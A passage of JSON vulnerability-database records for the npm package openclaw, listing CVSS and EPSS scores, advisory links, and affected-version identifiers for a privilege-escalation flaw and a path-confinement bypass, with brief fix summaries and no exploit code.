:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hf68-49fm-59cq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35639","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35639"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-device-pair-approve-scope-validation","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-device-pair-approve-scope-validation"},{"reference_url":"https://github.com/advisories/GHSA-r3v5-2grc-429h","reference_id":"GHSA-r3v5-2grc-429h","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r3v5-2grc-429h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-r3v5-2grc-429h"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8aek-6dw1-tudj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50589?format=json","vulnerability_id":"VCID-8u6d-ekbs-afgd","summary":"OpenClaw: Unified root-bound write hardening for browser output and related path-boundary flows\nA path-confinement bypass in browser output handling allowed writes outside intended roots in `openclaw` versions up to and including `2026.3.1`.\n\nThe fix unifies root-bound, file-descriptor-verified write semantics and canonical path-boundary validation across browser output and related install/skills write paths.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22180","reference_id":"","reference_type":"","scores":[{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06222","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06226","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06237","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22180"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/104d32bb64cdf19d5e77f70553a511a2ae90ad1c","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-18T16:04:16Z/"}],"url":"https://github.com/openclaw/openclaw/commit/104d32bb64cdf19d5e77f70553a511a2ae90ad1c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22180","reference_id":"CVE-2026-22180","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22180"},{"reference_url":"https://github.com/advisories/GHSA-3pxq-f3cp-jmxp","reference_id":"GHSA-3pxq-f3cp-jmxp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3pxq-f3cp-jmxp"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3pxq-f3cp-jmxp","reference_id":"GHSA-3pxq-f3cp-jmxp","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-18T16:04:16Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3pxq-f3cp-jmxp"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-path-confinement-bypass-in-browser-output-and-file-write-operations","reference_id":"openclaw-path-confinement-bypass-in-browser-output-and-file-write-operations","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-18T16:04:16Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-path-confinement-bypass-in-browser-output-and-file-write-operations"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-